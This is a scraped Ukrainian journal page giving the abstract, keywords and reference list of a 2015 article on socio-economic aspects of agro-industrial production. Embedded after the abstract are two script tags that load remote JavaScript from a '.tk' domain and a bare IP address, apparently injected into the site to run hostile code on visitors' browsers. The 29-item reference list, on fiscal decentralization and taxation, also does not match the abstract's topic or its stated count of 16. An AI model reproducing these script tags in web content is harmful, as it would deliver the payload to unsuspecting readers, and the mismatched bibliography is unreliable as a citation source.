ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.101.54
Економіка агропромислового виробництва

Соціально-економічні аспекти розвитку агропромислового виробництва / Попрозман Н. В. // Економіка АПК. - 2015. - № 3 - С. 15

У розрізі глобалізаційних процесів і згідно з сучасними тенденціями економічного розвитку національної економіки акцентується увага на значенні якості продукції та конкурентоспроможності агропромислового виробництва на внутрішньому й зовнішньому ринках. Розглядаються показники розвитку національної економіки, виходячи з міжнародних рейтингів та індексів, які розраховуються міжнародними інституціями. Вказується на стратегічне значення запровадження системи менеджменту якості на товари й послуги агропромислового виробництва. Побудовано тренди розвитку таких показників, як експорт, імпорт товарів і прямих іноземних інвестицій в Україну. Проаналізовано співпрацю з міжнародними фінансовими організаціями та відзначено існування ключових економічних секторів, що є пріоритетними для вкладення інвестиційних ресурсів. Обґрунтовується значення усунення диспропорцій регіональної політики, потенціалу регіону й вибору парадигми економічного розвитку АПК. Табл.: 1. Рис.: 3 Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: глобалізація, якість, конкурентоспроможність, розвиток, соціально-економічні умови, інвестування, тренд, парадигма, агропромислове виробництво

Список використаних джерел

 1. Аналіз фінансових наслідків адміністративно-територіальної реформи [Електронний ресурс] / Проект SuFTAR Системне управління фінансуванням адміністративно-територіальної реформи. – Портал FISCO-ID. – Режим доступу: http://fisco-id.com/?module=an&action=preview&id=70.
 2. Бюджетний кодекс України, Закон України від 8 липня 2010 року N 2456-VI // Офіц. вісник України. – 2010. – № 59 (13.08.2010). – Ст. 2047.
 3. Бюджет – як сито [Електронний ресурс] // Віче (журнал Верховної Ради України). – 2009. – Лютий. – № 4. – Режим доступу http://www.viche.info/journal/ 1319.
 4. Гройсман В. Концепція реформи місцевого самоврядування та проект змін до Конституції України (щодо децентралізації влади) // Офіц. сайт Міністерства регіонального розвиту, будівництва та житлово-комунального господарства. – Режим доступу: http://www.minregion.gov.ua/attachments/content-attachments/2919/240414.pdf.
 5. Децентрализация и налогообложение сельскохозяйственной недвижимости [Електронний ресурс] / Продовольственная и сельскохозяйственная организация Объединенных Наций. – Рим, 2005. – Режим доступу: http://www.fao.org/docrep/007/ y5444r/y5444r00.htm.
 6. Диверсифікація доходів місцевих бюджетів / [Луніна І.О., Кириленко О.П., Лучка А.В. та ін.]; за ред. І.О. Луніної; НАН України, Ін-т економіки та прогнозування. – К.: 2010. – 320 с.
 7. Європейська Хартія місцевого самоврядування, ратифікована Законом України від 15.07.97 №452/97-ВР [Електронний ресурс] // База даних «Законодавство України» офіційного сайту Верховної Ради України. – Режим доступу http://zakon3.rada.gov.ua/laws/show/994_036.
 8. Концепція реформування місцевого самоврядування та територіальної організації влади в Україні, схвалена розпорядженням Кабінету Міністрів України від 1 квітня 2014 р. № 333-р [Електронний ресурс] // База даних «Законодавство України» офіційного сайту Верховної ради України. – Режим доступу (URL): http://zakon4.rada.gov.ua/laws/show/333-2014-%D1%80.
 9. Негода В. Децентралізація влади: основні засади реформування місцевого самоврядування та територіальної організації влади в Україні [Електронний ресурс] // Офіційний портал Черкаської ОДА.- Режим доступу: www.oda.ck.ua/docs/ 2014/decenralizacia/3.ppt.
 10. План заходів щодо реалізації Концепції реформування місцевого самоврядування та територіальної організації влади в Україні, затверджений розпорядженням Кабінету Міністрів України від 18 червня 2014 р. № 591-р // Уряд. кур'єр. – 23.07.2014. – № 131.
 11. Про внесення змін до Бюджетного кодексу України щодо реформи міжбюджетних відносин, Закон України від 28 груд. 2014 року N 79-VIII // Офіц. вісник України. – 2015. – N 3 (16.01.2015). – Ст. 54.
 12. Про внесення змін до Конституції України (щодо повноважень органів державної влади та місцевого самоврядування), проект Закону України від 26.06.2014 № 4178а [Електронний ресурс] // База даних «Законопроекти» офіц. сайту Верховної Ради України. - Режим доступу: http://w1.c1.rada.gov.ua/pls/zweb2/webproc4_1?pf3511=51513.
 13. Про внесення змін до Податкового кодексу України та деяких законодавчих актів України щодо податкової реформи, Закон України від 28 груд. 2014 року N 71-VIII // Офіційний вісник України. – 2015. – № 3 (16.01.2015). – Ст. 46.
 14. Про добровільне об’єднання громад, Проект Закону України, підтриманий Верховною Радою України [Електронний ресурс] // База даних «Законопроекти» на офіц. сайті Верховної Ради України. – Режим доступу: http://w1.c1.rada.gov.ua/pls/zweb2/webproc4_1?pf3511=52379.
 15. Про місцеве самоврядування в Україні, Закон України від 21 трав. 1997 року N 280/97-ВР // Відом. Верхов. Ради України (ВВР). – 1997. – № 24. – Ст. 170.
 16. Трофимова И.Н. Децентрализация государственного управления и особенности центр-локальных отношений в европейских странах / И.Н Трофимова // Сравнительная политика. – 2011. – № 4. – С. 35-44 .
 17. Тулуш Л.Д. Оподаткування нерухомості в Україні: проблеми запровадження та перспективи функціонування / Л.Д. Тулуш // Вчені записки Університету «КРОК»: Серія «Економічні науки». – 2014. – № 36. – С. 77-78.
 18. Тулуш Л.Д. Економічний зміст плати за землю / Л.Д. Тулуш // Фінанси України. – 2002. – № 9. – С. 24-30.
 19. Тулуш Л.Д. Реформування механізму прямого оподаткування сільсько-господарських підприємств / Л.Д. Тулуш // Економіка АПК. – 2014. – № 10. – С. 34-45.
 20. Тулуш Л.Д. Формування механізму оподаткування доходів від ведення особистого селянського господарства / Л.Д. Тулуш // Наук. вісн. Нац. ун-ту держ. подат. служби України (економіка, право). – 2010. – №1. – С. 144-151.
 21. Фіскальна децентралізація в Україні : поточний стан та необхідність реформ / Проект з регіонального врядування та розвитку України за підтримки Канадського агентства з міжнародного розвитку [Електронний ресурс] // Міжрегіональна інфор-маційно-освітня мережа "Ефективна держава". – Режим доступу: http://derzhava.in.ua/ Lists/2/Attachments/1812/Fiscal_Decentralization_in_Ukraine_2006_UKR.pdf.
 22. Bird R. M., Smart М. Intergovernmental Fiscal Transfers: International Lessons for Developing Countries [Електронний ресурс] // World Development. – 2002. - Vol. 30. - No. 6. - pp. 899–912. – Режим доступу: http://www1.worldbank.org/publicsector/pe/pfma07/ BirdSmart2002.pdf.
 23. Boadway R., Roberts S., Shah A. The reform of fiscal systems in developing and emerging market economies: a federalism perspective // Policy Research Working Paper, World Bank, Washington, DC. – 1994. – № 1259.
 24. De Mello L. Fiscal Decentralization and Intergovernmental Fiscal Relations: A Cross-Country Analysis / De Mello L. // World Development. – 2000. – № 28 (2). – Р. 365–380.
 25. Joumard І., Kongsrud Р.М. Fiscal relations across government levels [Електронний ресурс] // OECD Economics Department Working Papers, N 375. – Режим доступу http://dx.doi.org/10.1787/45551387174.
 26. Oates W. E. An Essay on Fiscal Federalism // Journal of Economic Literature. – 1999. – Vol. 37. – № 3. – P. 1120-1149.
 27. Prud’homme R. The Dangers of Decentralization // The World bank research observer. – 1995. – № 10 (2). – Р. 201–220.
 28. Richard M., Ebel D., Wallich C. Decentralization of the Socialist State: Intergovern-mental Finance in Transition Economies . – Washington, D.C.: World Bank, 1995.
 29. Wildasin D. E. Fiscal Aspects of Evolving Federations. – Cambridge, U.K.: Cambridge University Press, 1997.
Читати статтю: 15_03_15-22.pdf